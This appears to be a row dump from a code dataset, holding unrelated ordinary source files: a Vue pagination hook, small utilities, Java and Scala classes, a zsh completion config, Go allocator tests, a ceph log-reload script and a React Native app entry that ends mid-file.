text stringlengths 1 1.05M |
|---|
<filename>components/table/hooks/usePagination.ts
import useState from '../../_util/hooks/useState';
import type { Ref } from 'vue';
import { computed } from 'vue';
import type { PaginationProps } from '../../pagination';
import type { TablePaginationConfig } from '../interface';
export const DEFAULT_PAGE_SIZE = 10;
/**
 * Builds the plain parameter object that is handed back to user callbacks.
 *
 * Always forwards `current` and `pageSize` from the merged pagination; in
 * addition, every key the caller explicitly configured on `pagination` is
 * mirrored back with its *merged* value — except function-typed entries
 * (callbacks), which are excluded from the param object.
 */
export function getPaginationParam(
  pagination: TablePaginationConfig | boolean | undefined,
  mergedPagination: TablePaginationConfig,
) {
  const param: any = {
    current: mergedPagination.current,
    pageSize: mergedPagination.pageSize,
  };

  // `pagination` may be a boolean toggle; only object configs contribute keys.
  const configured = pagination && typeof pagination === 'object' ? pagination : {};
  for (const key of Object.keys(configured)) {
    const mergedValue = (mergedPagination as any)[key];
    if (typeof mergedValue !== 'function') {
      param[key] = mergedValue;
    }
  }
  return param;
}
/**
 * Shallow-merges the given objects left to right into a fresh object.
 * Falsy arguments are skipped entirely, and `undefined` values never
 * overwrite an earlier value (unlike Object.assign / spread).
 */
function extendsObject<T extends Object>(...list: T[]) {
  const merged = {} as T;
  for (const source of list) {
    if (!source) continue;
    for (const [key, val] of Object.entries(source)) {
      if (val !== undefined) {
        (merged as any)[key] = val;
      }
    }
  }
  return merged;
}
/**
 * Table pagination hook.
 *
 * Merges three sources of pagination state — internal state (current/pageSize),
 * the user-provided `pagination` prop, and the data-driven total — into one
 * reactive config, and exposes a reset helper.
 *
 * @param totalRef      reactive total row count derived from the data source
 * @param paginationRef reactive pagination prop (`false` disables pagination)
 * @param onChange      notified after every page/pageSize change
 * @returns `[mergedPagination, refreshPagination]`
 */
export default function usePagination(
  totalRef: Ref<number>,
  paginationRef: Ref<TablePaginationConfig | false | undefined>,
  onChange: (current: number, pageSize: number) => void,
): [Ref<TablePaginationConfig>, () => void] {
  // Normalize the prop: `false`/`undefined`/booleans collapse to an empty object.
  const pagination = computed(() =>
    paginationRef.value && typeof paginationRef.value === 'object' ? paginationRef.value : {},
  );
  const paginationTotal = computed(() => pagination.value.total || 0);
  // Internal current/pageSize, seeded from the `default*` props (or 1/10).
  const [innerPagination, setInnerPagination] = useState<{
    current?: number;
    pageSize?: number;
  }>(() => ({
    current: 'defaultCurrent' in pagination.value ? pagination.value.defaultCurrent : 1,
    pageSize:
      'defaultPageSize' in pagination.value ? pagination.value.defaultPageSize : DEFAULT_PAGE_SIZE,
  }));
  // ============ Basic Pagination Config ============
  // Merge precedence: inner state < user prop < computed total. A user-supplied
  // `total` wins over the data-derived one.
  const mergedPagination = computed(() => {
    const mP = extendsObject<Partial<TablePaginationConfig>>(
      innerPagination.value,
      pagination.value,
      {
        total: paginationTotal.value > 0 ? paginationTotal.value : totalRef.value,
      },
    );
    // Reset `current` if data length or pageSize changed
    const maxPage = Math.ceil((paginationTotal.value || totalRef.value) / mP.pageSize!);
    if (mP.current! > maxPage) {
      // Prevent a maximum page count of 0
      mP.current = maxPage || 1;
    }
    return mP;
  });
  // Reset to page 1 (e.g. after filters change), optionally with a new pageSize.
  const refreshPagination = (current = 1, pageSize?: number) => {
    // NOTE(review): `pagination` is a computed that already maps `false` to {},
    // so this guard looks unreachable — confirm whether it was meant to test
    // `paginationRef.value` instead.
    if (pagination.value === false) return;
    setInnerPagination({
      current,
      pageSize: pageSize || mergedPagination.value.pageSize,
    });
  };
  // Invoked by the Pagination component: forward to the user's onChange prop,
  // sync internal state, then notify the table so it can re-slice its data.
  const onInternalChange: PaginationProps['onChange'] = (current, pageSize) => {
    if (pagination.value) {
      pagination.value.onChange?.(current, pageSize);
    }
    refreshPagination(current, pageSize);
    onChange(current, pageSize || mergedPagination.value.pageSize);
  };
  return [
    computed(() => {
      return pagination.value === false
        ? {}
        : { ...mergedPagination.value, onChange: onInternalChange };
    }),
    refreshPagination,
  ];
}
|
/**
 * Returns the two smallest strictly-positive elements of `array` as
 * [smallest, secondSmallest]. Slots that cannot be filled stay null.
 *
 * Bug fixed: the original seeded `smallestNumber` with array[0] (even if it
 * was non-positive) and compared candidates against a null second slot —
 * `x < null` is always false, so the second-smallest was almost never found
 * (the sample below returned [4, null]).
 */
const findTwoSmallestElements = function(array) {
  let smallestNumber = null;
  let secondSmallestNumber = null;
  for (let i = 0; i < array.length; i++) {
    const value = array[i];
    if (value <= 0) continue; // only positive values count, per original intent
    if (smallestNumber === null || value < smallestNumber) {
      // New minimum: previous minimum becomes the runner-up.
      secondSmallestNumber = smallestNumber;
      smallestNumber = value;
    } else if (secondSmallestNumber === null || value < secondSmallestNumber) {
      secondSmallestNumber = value;
    }
  }
  return [smallestNumber, secondSmallestNumber];
}
let array = [4, 15, 11, 9, 0, 8, 7, -1]
let smallestTwo = findTwoSmallestElements(array);
console.log("The two smallest elements are: " + smallestTwo[0] + " and " + smallestTwo[1]); // Output: "The two smallest elements are: 4 and 7"
# Using recursion to sum the numbers in a list
def recursive_sum(arr):
    """Recursively sum the numbers in *arr*; an empty list sums to 0."""
    # Base case: empty list. Otherwise fold head + sum of the tail.
    return 0 if not arr else arr[0] + recursive_sum(arr[1:])


print("Sum of the list:", recursive_sum([2, 4, 6, 8]))
package io.opensphere.mantle.icon.chooser.view;
import javafx.scene.layout.AnchorPane;
import io.opensphere.mantle.icon.chooser.model.IconModel;
/** Packages UI elements into one pane. */
/** Packages UI elements into one pane. */
public class IconView extends AnchorPane
{
    /** Panel comprised of Tree and icon display. */
    private final IconSelectionPanel myMainPanel;

    /** The Model for the entire UI. */
    private final IconModel myPanelModel;

    /**
     * Creates the sub-panels composing the UI and anchors the main panel to
     * all four edges of this pane so it fills the available space.
     *
     * @param panelModel the model used for the UI.
     */
    public IconView(IconModel panelModel)
    {
        myPanelModel = panelModel;
        myMainPanel = new IconSelectionPanel(myPanelModel);

        final Double edge = Double.valueOf(0.0);
        setTopAnchor(myMainPanel, edge);
        setBottomAnchor(myMainPanel, edge);
        setLeftAnchor(myMainPanel, edge);
        setRightAnchor(myMainPanel, edge);

        getChildren().add(myMainPanel);
    }

    /**
     * Gets the panel on which details are rendered.
     *
     * @return the panel on which details are rendered.
     */
    public IconDetail getDetailPanel()
    {
        return myMainPanel.getDetailPane();
    }
}
|
<gh_stars>1-10
from django.contrib.auth.backends import ModelBackend as BaseModelBackend
class ModelBackend(BaseModelBackend):
    """Custom permission backend that uses model methods to check for permissions.

    Every hook currently delegates straight to Django's default
    ``ModelBackend``; this class exists as the extension point where
    model-based permission checks can be layered in.
    """

    def get_user_permissions(self, user_obj, obj=None):
        # Pass through to Django's default user-permission lookup.
        return super().get_user_permissions(user_obj, obj)

    def get_group_permissions(self, user_obj, obj=None):
        # Pass through to Django's default group-permission lookup.
        return super().get_group_permissions(user_obj, obj)

    def get_all_permissions(self, user_obj, obj=None):
        # Union of user and group permissions, as computed by the base class.
        return super().get_all_permissions(user_obj, obj)

    def has_perm(self, user_obj, perm, obj=None):
        # Defer the single-permission check to the base implementation.
        return super().has_perm(user_obj, perm, obj)

    def has_module_perms(self, user_obj, app_label):
        # Defer the per-app check to the base implementation.
        return super().has_module_perms(user_obj, app_label)

    def with_perm(self, perm, is_active=True, include_superusers=True, obj=None):
        # Defer the reverse lookup (users holding a permission) to the base class.
        return super().with_perm(perm, is_active, include_superusers, obj)
|
import { Trans } from '@lingui/macro';
import React, { Component } from 'react';
import Dialog from '../UI/Dialog';
import Window from '../Utils/Window';
import FlatButton from '../UI/FlatButton';
import Text from '../UI/Text';
import { ResponsiveWindowMeasurer } from '../UI/Reponsive/ResponsiveWindowMeasurer';
import Fullscreen from '@material-ui/icons/Fullscreen';
import RaisedButton from '../UI/RaisedButton';
import { Spacer, Line } from '../UI/Grid';
/**
 * Welcome dialog for the online (beta) version of GDevelop.
 *
 * Props: `open` (controls visibility) and `onClose`. Offers a button linking
 * to the desktop download, and — on small screens only — a prompt to enter
 * fullscreen mode.
 */
export default class BetaIntroDialog extends Component {
  // Opens the GDevelop website in an external browser window.
  _onOpenWebsite() {
    Window.openExternalURL('http://gdevelop-app.com');
  }

  render() {
    const { open, onClose } = this.props;
    // ResponsiveWindowMeasurer supplies the current window size class so the
    // fullscreen suggestion is only rendered for 'small' windows.
    return (
      <ResponsiveWindowMeasurer>
        {windowWidth => (
          <Dialog
            title={<Trans>Welcome to GDevelop</Trans>}
            actions={[
              <FlatButton
                key="download"
                label={<Trans>Download GDevelop desktop app</Trans>}
                primary={false}
                onClick={this._onOpenWebsite}
              />,
              <FlatButton
                label={<Trans>Close</Trans>}
                primary={false}
                onClick={onClose}
                key="close"
              />,
            ]}
            open={open}
            onRequestClose={onClose}
          >
            <div>
              <Text>
                <Trans>
                  This is a version of GDevelop 5 that you can try online.
                </Trans>
              </Text>
              <Text>
                Choose a <b>new project to create</b>, then edit the scene or
                the events ruling the game. You can{' '}
                <b>launch a preview of your game</b> at any time.
              </Text>
              <Text>
                <Trans>
                  Download the full version of GDevelop on your desktop computer
                  to create your own game without limits!
                </Trans>
              </Text>
              {windowWidth === 'small' &&
                (!Window.isFullscreen() ? (
                  <React.Fragment>
                    <Spacer />
                    <Text>
                      <Trans>
                        You're working on a small screen. It's recommended to
                        activate Fullscreen Mode for using GDevelop.
                      </Trans>
                    </Text>
                    <Line justifyContent="center">
                      <RaisedButton
                        label={<Trans>Activate Fullscreen</Trans>}
                        primary
                        onClick={() => {
                          Window.requestFullscreen();
                          setTimeout(() => {
                            this.forceUpdate();
                          }, 250 /* Let a bit of time for the fullscreen to kick in */);
                        }}
                        labelPosition="before"
                        icon={<Fullscreen />}
                      />
                    </Line>
                  </React.Fragment>
                ) : (
                  <Line justifyContent="center">
                    <RaisedButton
                      label={<Trans>Start using GDevelop</Trans>}
                      primary
                      onClick={onClose}
                      labelPosition="before"
                    />
                  </Line>
                ))}
            </div>
          </Dialog>
        )}
      </ResponsiveWindowMeasurer>
    );
  }
}
|
#
# Sets completion options.
#
# Authors:
#   Robby Russell <robby@planetargon.com>
#   Sorin Ionescu <sorin.ionescu@gmail.com>
#

# Return if requirements are not found.
if [[ "$TERM" == 'dumb' ]]; then
  return 1
fi

# Add zsh-completions to $fpath.
fpath=("${0:h}/external/src" $fpath)

# Load and initialize the completion system ignoring insecure directories.
autoload -Uz compinit && compinit -i

#
# Options
#

setopt COMPLETE_IN_WORD    # Complete from both ends of a word.
setopt ALWAYS_TO_END       # Move cursor to the end of a completed word.
setopt PATH_DIRS           # Perform path search even on command names with slashes.
setopt AUTO_MENU           # Show completion menu on a successive tab press.
setopt AUTO_LIST           # Automatically list choices on ambiguous completion.
setopt AUTO_PARAM_SLASH    # If completed parameter is a directory, add a trailing slash.
unsetopt MENU_COMPLETE     # Do not autoselect the first completion entry.
unsetopt FLOW_CONTROL      # Disable start/stop characters in shell editor.

#
# Styles
#

# Use caching to make completion for commands such as dpkg and apt usable.
zstyle ':completion::complete:*' use-cache on
zstyle ':completion::complete:*' cache-path "${ZDOTDIR:-$HOME}/.zcompcache"

# Case-insensitive (all), partial-word, and then substring completion.
if zstyle -t ':prezto:module:completion:*' case-sensitive; then
  zstyle ':completion:*' matcher-list 'r:|[._-]=* r:|=*' 'l:|=* r:|=*'
  setopt CASE_GLOB
else
  zstyle ':completion:*' matcher-list 'm:{a-zA-Z}={A-Za-z}' 'r:|[._-]=* r:|=*' 'l:|=* r:|=*'
  unsetopt CASE_GLOB
fi

# Group matches and describe.
zstyle ':completion:*:*:*:*:*' menu select
zstyle ':completion:*:matches' group 'yes'
zstyle ':completion:*:options' description 'yes'
zstyle ':completion:*:options' auto-description '%d'
zstyle ':completion:*:corrections' format ' %F{green}-- %d (errors: %e) --%f'
zstyle ':completion:*:descriptions' format ' %F{yellow}-- %d --%f'
zstyle ':completion:*:messages' format ' %F{purple} -- %d --%f'
zstyle ':completion:*:warnings' format ' %F{red}-- no matches found --%f'
zstyle ':completion:*:default' list-prompt '%S%M matches%s'
zstyle ':completion:*' format ' %F{yellow}-- %d --%f'
zstyle ':completion:*' group-name ''
zstyle ':completion:*' verbose yes

# Fuzzy match mistyped completions.
zstyle ':completion:*' completer _complete _match _approximate
zstyle ':completion:*:match:*' original only
zstyle ':completion:*:approximate:*' max-errors 1 numeric

# Increase the number of errors based on the length of the typed word.
zstyle -e ':completion:*:approximate:*' max-errors 'reply=($((($#PREFIX+$#SUFFIX)/3))numeric)'

# Don't complete unavailable commands.
zstyle ':completion:*:functions' ignored-patterns '(_*|pre(cmd|exec))'

# Array completion element sorting.
zstyle ':completion:*:*:-subscript-:*' tag-order indexes parameters

# Directories
zstyle ':completion:*:default' list-colors ${(s.:.)LS_COLORS}
zstyle ':completion:*:*:cd:*' tag-order local-directories directory-stack path-directories
zstyle ':completion:*:*:cd:*:directory-stack' menu yes select
zstyle ':completion:*:-tilde-:*' group-order 'named-directories' 'path-directories' 'users' 'expand'
zstyle ':completion:*' squeeze-slashes true

# History
zstyle ':completion:*:history-words' stop yes
zstyle ':completion:*:history-words' remove-all-dups yes
zstyle ':completion:*:history-words' list false
zstyle ':completion:*:history-words' menu yes

# Environmental Variables
zstyle ':completion::*:(-command-|export):*' fake-parameters ${${${_comps[(I)-value-*]#*,}%%,*}:#-*-}

# Populate hostname completion.
zstyle -e ':completion:*:hosts' hosts 'reply=(
${=${=${=${${(f)"$(cat {/etc/ssh_,~/.ssh/known_}hosts(|2)(N) 2>/dev/null)"}%%[#| ]*}//\]:[0-9]*/ }//,/ }//\[/ }
${=${(f)"$(cat /etc/hosts(|)(N) <<(ypcat hosts 2>/dev/null))"}%%\#*}
${=${${${${(@M)${(f)"$(cat ~/.ssh/config 2>/dev/null)"}:#Host *}#Host }:#*\**}:#*\?*}}
)'

# Don't complete uninteresting users...
zstyle ':completion:*:*:*:users' ignored-patterns \
adm amanda apache avahi beaglidx bin cacti canna clamav daemon \
dbus distcache dovecot fax ftp games gdm gkrellmd gopher \
hacluster haldaemon halt hsqldb ident junkbust ldap lp mail \
mailman mailnull mldonkey mysql nagios \
named netdump news nfsnobody nobody nscd ntp nut nx openvpn \
operator pcap postfix postgres privoxy pulse pvm quagga radvd \
rpc rpcuser rpm shutdown squid sshd sync uucp vcsa xfs '_*'

# ... unless we really want to.
zstyle '*' single-ignored show

# Ignore multiple entries.
zstyle ':completion:*:(rm|kill|diff):*' ignore-line other
zstyle ':completion:*:rm:*' file-patterns '*:all-files'

# Kill
zstyle ':completion:*:*:*:*:processes' command 'ps -u $USER -o pid,user,comm -w'
zstyle ':completion:*:*:kill:*:processes' list-colors '=(#b) #([0-9]#) ([0-9a-z-]#)*=01;36=0=01'
zstyle ':completion:*:*:kill:*' menu yes select
zstyle ':completion:*:*:kill:*' force-list always
zstyle ':completion:*:*:kill:*' insert-ids single

# Man
zstyle ':completion:*:manuals' separate-sections true
zstyle ':completion:*:manuals.(^1*)' insert-sections true

# Media Players
zstyle ':completion:*:*:mpg123:*' file-patterns '*.(mp3|MP3):mp3\ files *(-/):directories'
zstyle ':completion:*:*:mpg321:*' file-patterns '*.(mp3|MP3):mp3\ files *(-/):directories'
zstyle ':completion:*:*:ogg123:*' file-patterns '*.(ogg|OGG|flac):ogg\ files *(-/):directories'
zstyle ':completion:*:*:mocp:*' file-patterns '*.(wav|WAV|mp3|MP3|ogg|OGG|flac):ogg\ files *(-/):directories'

# Mutt
if [[ -s "$HOME/.mutt/aliases" ]]; then
  zstyle ':completion:*:*:mutt:*' menu yes select
  zstyle ':completion:*:mutt:*' users ${${${(f)"$(<"$HOME/.mutt/aliases")"}#alias[[:space:]]}%%[[:space:]]*}
fi

# SSH/SCP/RSYNC
zstyle ':completion:*:(scp|rsync):*' tag-order 'hosts:-host:host hosts:-domain:domain hosts:-ipaddr:ip\ address *'
zstyle ':completion:*:(scp|rsync):*' group-order users files all-files hosts-domain hosts-host hosts-ipaddr
zstyle ':completion:*:ssh:*' tag-order 'hosts:-host:host hosts:-domain:domain hosts:-ipaddr:ip\ address *'
zstyle ':completion:*:ssh:*' group-order users hosts-domain hosts-host users hosts-ipaddr
zstyle ':completion:*:(ssh|scp|rsync):*:hosts-host' ignored-patterns '*(.|:)*' loopback ip6-loopback localhost ip6-localhost broadcasthost
zstyle ':completion:*:(ssh|scp|rsync):*:hosts-domain' ignored-patterns '<->.<->.<->.<->' '^[-[:alnum:]]##(.[-[:alnum:]]##)##' '*@*'
zstyle ':completion:*:(ssh|scp|rsync):*:hosts-ipaddr' ignored-patterns '^(<->.<->.<->.<->|(|::)([[:xdigit:].]##:(#c,2))##(|%*))' '127.0.0.<->' '255.255.255.255' '::1' 'fe80::*'
zstyle ':completion:*:*:git:*' script ~/.git-completion.bash |
../phyhat_gene.py -f ex_gene.fa -d ex_gene.db -n "SpA SpB SpC SpD spE" |
package com.mblinn.mbfpp.oo.strategy

object PeopleExample {
  /** A person where any of the three name parts may be absent. */
  case class Person(
    firstName: Option[String],
    middleName: Option[String],
    lastName: Option[String])

  /** Valid when at least the first name is present. */
  def isFirstNameValid(person: Person) = person.firstName.isDefined

  /** Valid only when every name part is present. */
  def isFullNameValid(person: Person) =
    person.firstName.isDefined && person.middleName.isDefined && person.lastName.isDefined

  /**
   * Returns a stateful closure that accumulates every person passing
   * `isValid` and hands back the collection gathered so far.
   */
  def personCollector(isValid: (Person) => Boolean) = {
    var collected = Vector[Person]()
    (candidate: Person) => {
      if (isValid(candidate)) collected = collected :+ candidate
      collected
    }
  }

  // Sample data: full name, partial name, and no name at all.
  val p1 = Person(Some("John"), Some("Quincy"), Some("Adams"))
  val p2 = Person(Some("Mike"), None, Some("Linn"))
  val p3 = Person(None, None, None)
}
export * from './error.middleware';
export * from './validation.middleware';
export * from './i18n.middleware';
|
const assert = require('assert');
const std = require('../../src');
/* global describe it */
// Exercises std.unique on three container types. Each test fills a container
// with random digits (duplicates guaranteed), runs std.unique, then walks the
// container asserting no key/value is ever seen twice.
describe('unique test', () => {
  it('list test', () => {
    const list = new std.List();
    const limit = 1000;
    for (let i = 0; i < limit; i += 1) {
      list.pushBack(Math.floor(Math.random() * 10));
    }
    std.unique(list);
    // Record each value on first sight; a repeat means unique() failed.
    const dict = {};
    for (let node = list.begin(); node !== list.end(); node = node.getNext()) {
      assert.strictEqual(dict[node.getData()], undefined);
      dict[node.getData()] = true;
    }
  });
  it('MultiSetTree removeCondition test', () => {
    const multiSetTree = new std.MultiSetTree();
    const limit = 1000;
    for (let i = 0; i < limit; i += 1) {
      multiSetTree.insert(Math.floor(Math.random() * 10));
    }
    std.unique(multiSetTree);
    // After unique(), an in-order traversal must yield distinct keys only.
    const dict = {};
    for (let node = multiSetTree.begin(); node !== multiSetTree.end(); node = node.getNext()) {
      assert.strictEqual(dict[node.getKey()], undefined);
      dict[node.getKey()] = true;
    }
  });
  it('mutiMapTree removeCondition test', () => {
    const multiMapTree = new std.MultiMapTree();
    const limit = 1000;
    // Values are the loop index; only the keys are deduplicated below.
    for (let i = 0; i < limit; i += 1) {
      multiMapTree.insert(Math.floor(Math.random() * 10), i);
    }
    std.unique(multiMapTree);
    const dict = {};
    for (let node = multiMapTree.begin(); node !== multiMapTree.end(); node = node.getNext()) {
      assert.strictEqual(dict[node.getKey()], undefined);
      dict[node.getKey()] = true;
    }
  });
});
|
package info.u250.c2d.box2d.model.joint;
import info.u250.c2d.box2d.model.b2JointDefModel;
import com.badlogic.gdx.math.Vector2;
/**
 * Serializable definition model for a Box2D revolute joint. Angles are stored
 * in degrees (Box2D itself uses radians) and anchors are local to each body.
 */
public class b2RevoluteJointDefModel extends b2JointDefModel{
    private static final long serialVersionUID = 1L;
    /** The local anchor point relative to body1's origin. */
    public final Vector2 localAnchorA = new Vector2();
    /** The local anchor point relative to body2's origin. */
    public final Vector2 localAnchorB = new Vector2(); // fixed: stray ";;" removed
    /** The body2 angle minus body1 angle in the reference state (Degrees). */
    public float referenceDegrees = 0;
    /** A flag to enable joint limits. */
    public boolean enableLimit = false;
    /** The lower angle for the joint limit (Degrees). */
    public float lowerDegrees = 0;
    /** The upper angle for the joint limit (Degrees). */
    public float upperDegrees = 0;
    /** A flag to enable the joint motor. */
    public boolean enableMotor = false;
    /** The desired motor speed. Usually in radians per second. */
    public float motorSpeed = 0;
    /** The maximum motor torque used to achieve the desired motor speed. Usually in N-m. */
    public float maxMotorTorque = 0;
}
|
package malte0811.controlengineering.util;
import com.mojang.datafixers.util.Pair;
import net.minecraftforge.common.util.NonNullConsumer;
import java.util.Objects;
/**
 * Holder for a value that a paired {@link Runnable} can later clear.
 * Useful for breaking reference cycles / releasing captured state.
 */
public class Clearable<T> {
    private T value;

    private Clearable(T value) {
        this.value = value;
    }

    /**
     * Wraps {@code value} and returns the wrapper together with a Runnable
     * that, when run, drops the wrapper's reference to the value.
     */
    public static <T> Pair<Clearable<T>, Runnable> create(T value) {
        final Clearable<T> wrapper = new Clearable<>(value);
        final Runnable clear = () -> wrapper.value = null;
        return Pair.of(wrapper, clear);
    }

    /** Returns the value; throws NullPointerException if already cleared. */
    public T getValue() {
        return Objects.requireNonNull(value);
    }

    /** Invokes {@code out} with the value only if it has not been cleared. */
    public void ifPresent(NonNullConsumer<T> out) {
        if (isPresent()) {
            out.accept(value);
        }
    }

    /** Returns whether the value is still present (not yet cleared). */
    public boolean isPresent() {
        return value != null;
    }
}
|
import base64


# Function to encode
def encode(text):
    """Base64-encode *text* (a str); returns the encoded value as ``bytes``."""
    return base64.b64encode(text.encode('utf-8'))


# Function to decode
def decode(text):
    """Decode a base64 payload (bytes or str) back into a ``str``."""
    return base64.b64decode(text).decode('utf-8')


# Main function
def main():
    """Round-trip a sample string through encode/decode, printing both forms."""
    message = "Hello World!"
    encoded = encode(message)
    print(encoded)
    print(decode(encoded))


if __name__ == '__main__':
    main()
package network
import (
"net"
"os"
"testing"
)
// TestAllocate allocates two IPs from the same /24 via the package-level
// ipAllocator and compares the bitmap file persisted at
// ipamDefaultAllocatorPath against the expected JSON snapshot.
// NOTE(review): the allocations target 192.168.10.0/24 while the expected
// snapshot is keyed by "192.168.0.0/24" — confirm how the allocator
// canonicalizes subnet keys. Also assumes the on-disk state is clean before
// the test runs.
func TestAllocate(t *testing.T) {
	subnet := `{"192.168.0.0/24":"1100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"}`
	tests := []struct {
		name string
		want string
	}{
		{"case1", subnet},
	}
	for _, tt := range tests {
		t.Run(tt.name, func(t *testing.T) {
			// ParseCIDR discards the host part; only the network is passed on.
			_, ipnet, _ := net.ParseCIDR("192.168.10.1/24")
			ip, err := ipAllocator.Allocate(ipnet)
			t.Logf("alloc ip: %v, err: %v", ip, err)
			_, ipnet, _ = net.ParseCIDR("192.168.10.1/24")
			ip, err = ipAllocator.Allocate(ipnet)
			t.Logf("alloc ip: %v, err: %v", ip, err)
			// Verify the allocator persisted exactly the expected bitmap.
			b, err := os.ReadFile(ipamDefaultAllocatorPath)
			if err != nil {
				t.Fatal(err)
			}
			if string(b) != tt.want {
				t.Fatal("unexpected result")
			}
		})
	}
	// cat /var/run/ddocker/network/ipam/subnet.json
	// subnet := `{"192.168.0.0/24":"1100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"}`
}
// TestReleases releases one previously-allocated IP (192.168.0.1) and checks
// that the persisted bitmap now marks only the network address bit.
// NOTE(review): depends on state left behind by TestAllocate (test ordering);
// confirm this is intentional.
func TestReleases(t *testing.T) {
	subnet := `{"192.168.0.0/24":"0100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"}`
	tests := []struct {
		name string
		want string
	}{
		{"case1", subnet},
	}
	for _, tt := range tests {
		t.Run(tt.name, func(t *testing.T) {
			// Here the parsed IP itself is needed — it is the address to release.
			ip, ipnet, _ := net.ParseCIDR("192.168.0.1/24")
			err := ipAllocator.Release(ipnet, ip)
			t.Logf("release err: %v", err)
			b, err := os.ReadFile(ipamDefaultAllocatorPath)
			if err != nil {
				t.Fatal(err)
			}
			if string(b) != tt.want {
				t.Fatal("unexpected result")
			}
		})
	}
	// cat /var/run/ddocker/network/ipam/subnet.json
	// subnet := `{"192.168.0.0/24":"0100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"}`
}
|
#!/bin/bash
# Copied from upstream logrotate
# Upstream source at https://github.com/ceph/ceph/blob/master/src/logrotate.conf

# Ask the init system (invoke-rc.d, falling back to service) to reload ceph so
# daemons reopen their log files after rotation.
if which invoke-rc.d > /dev/null 2>&1 && [ -x `which invoke-rc.d` ]; then
  invoke-rc.d ceph reload >/dev/null
elif which service > /dev/null 2>&1 && [ -x `which service` ]; then
  service ceph reload >/dev/null
fi
# Possibly reload twice, but depending on ceph.conf the reload above may be a no-op
if which initctl > /dev/null 2>&1 && [ -x `which initctl` ]; then
  for daemon in osd mon mds ; do
    # Each instance directory is named <cluster>-<id> under /var/lib/ceph/<daemon>/.
    find -L /var/lib/ceph/$daemon/ -mindepth 1 -maxdepth 1 -regextype posix-egrep -regex '.*/[A-Za-z0-9]+-[A-Za-z0-9._-]+' -printf '%P\n' \
    | while read f; do
        # Only reload instances that are initialized (done/ready marker) and
        # managed by upstart rather than sysvinit.
        if [ -e "/var/lib/ceph/$daemon/$f/done" -o -e "/var/lib/ceph/$daemon/$f/ready" ] && [ -e "/var/lib/ceph/$daemon/$f/upstart" ] && [ ! -e "/var/lib/ceph/$daemon/$f/sysvinit" ]; then
          cluster="${f%%-*}"
          id="${f#*-}"
          initctl reload ceph-$daemon cluster="$cluster" id="$id" 2>/dev/null || :
        fi
      done
  done
fi
# radosgw has no reload; restart it so it reopens its logs.
if [ -e "/etc/init.d/radosgw" ]; then
  /etc/init.d/radosgw restart >/dev/null
fi
|
<filename>App.js<gh_stars>0
import React, { useContext, useState, useEffect, useMemo, useReducer } from 'react';
import { StatusBar } from 'expo-status-bar';
import { StyleSheet, Text, View } from 'react-native';
import { NavigationContainer, StackActions } from '@react-navigation/native';
import { createDrawerNavigator } from '@react-navigation/drawer';
import MainTabScreen from './screens/MainTabScreen';
import DrawerContent from './screens/DrawerContent';
import SettingsScreen from './screens/SettingsScreen';
import RootStackScreen from './screens/RootStackScreen'
import { AppProvider, AppContext } from './provider/AppProvider'
import { AuthContext } from './context/AuthContext'
import { ActivityIndicator } from 'react-native-paper';
import { HOST_WITH_PORT } from './environment';
const Drawer = createDrawerNavigator();
/**
 * Root component: owns authentication state (via useReducer) and switches
 * between the authenticated drawer navigator and the auth stack.
 */
export default function App() {
  const state = useContext(AppContext)
  // const state = useContext(AppContext)
  // const [isLoading, setIsLoading] = useState(true);
  // const [userToken, setUserToken] = useState(null);
  // const [user, setUser] = useState(null);

  // Initial shape of the auth state managed by loginReducer below.
  const initialLoginState = {
    isLoading: false,
    email: null,
    user: null,
    userId: null,
    userToken: null,
    isValidEmail: true,
    isValidPassword: true,
  };

  // Auth state transitions.
  // NOTE(review): no default case — an unrecognized action type makes this
  // reducer return undefined; confirm every dispatched type is covered here.
  const loginReducer = (prevState, action) => {
    switch (action.type) {
      case 'RETRIEVE_TOKEN':
        return {
          ...prevState,
          userToken: action.token,
          isLoading: false
        };
      case 'LOGIN':
        return {
          ...prevState,
          email: action.id,
          userToken: action.token,
          isLoading: false,
          userId: action.userId
        };
      case 'LOGOUT':
        return {
          ...prevState,
          email: null,
          userToken: null,
          isLoading: false,
          userId: null,
        };
      case 'REGISTER':
        return {
          ...prevState,
          email: action.id,
          userToken: action.token,
          isLoading: false
        };
    }
  };

  const [loginState, dispatch] = useReducer(loginReducer, initialLoginState);

  // Auth actions exposed via AuthContext. Memoized with empty deps so consumers
  // receive a stable object identity across re-renders.
  const authContext = useMemo(() => ({
    // signIn expects the already-fetched login response (the network call that
    // used to live here is kept below, commented out).
    signIn: (email, response) => {
      // console.log(response)
      // fetch(`${HOST_WITH_PORT}/login`, {
      //     method: "POST",
      //     headers: {
      //         "Content-Type": "application/json",
      //     },
      //     body: JSON.stringify({
      //         email: email,
      //         password: password,
      //     })
      // }).then(response => {
      //     if (!response.ok) throw new Error("Email or password not found")
      //     return response.json()
      // }).then(response => {
      dispatch({
        type: "LOGIN",
        id: email,
        token: response.token,
        userId: response.user.id
      })
      // })
      // .catch(error => {
      //     console.log("Error:", error)
      // })
    },
    signOut: () => {
      dispatch({
        type: "LOGOUT",
      })
    },
    // signUp performs the registration request itself, then stores the token.
    // NOTE(review): no .catch on this fetch chain — a network failure rejects
    // unhandled; confirm whether errors should surface to the UI.
    signUp: (email, password) => {
      // setUserToken('<PASSWORD>')
      // setIsLoading(false)
      fetch(`${HOST_WITH_PORT}/users`, {
        method: "POST",
        headers: {
          "Accept": "application/json",
          "Content-Type": "application/json",
        },
        body: JSON.stringify({
          user: {
            email: email,
            password: password,
          }
        })
      }).then(response => response.json())
        .then(response => dispatch({
          type: "REGISTER",
          id: email,
          token: response.token
        }))
    },
  }), []);

  // While auth state is loading, show a centered spinner instead of the app.
  if ( loginState.isLoading ) {
    return (
      <View style={{flex: 1, justifyContent: 'center', alignItems: 'center'}}>
        <ActivityIndicator size="large" />
      </View>
    );
  }

  // With a token: drawer-based main app; without: the auth (root) stack.
  return (
    <AuthContext.Provider value={authContext}>
      <AppProvider>
        <NavigationContainer>
          { loginState.userToken !== null ? (
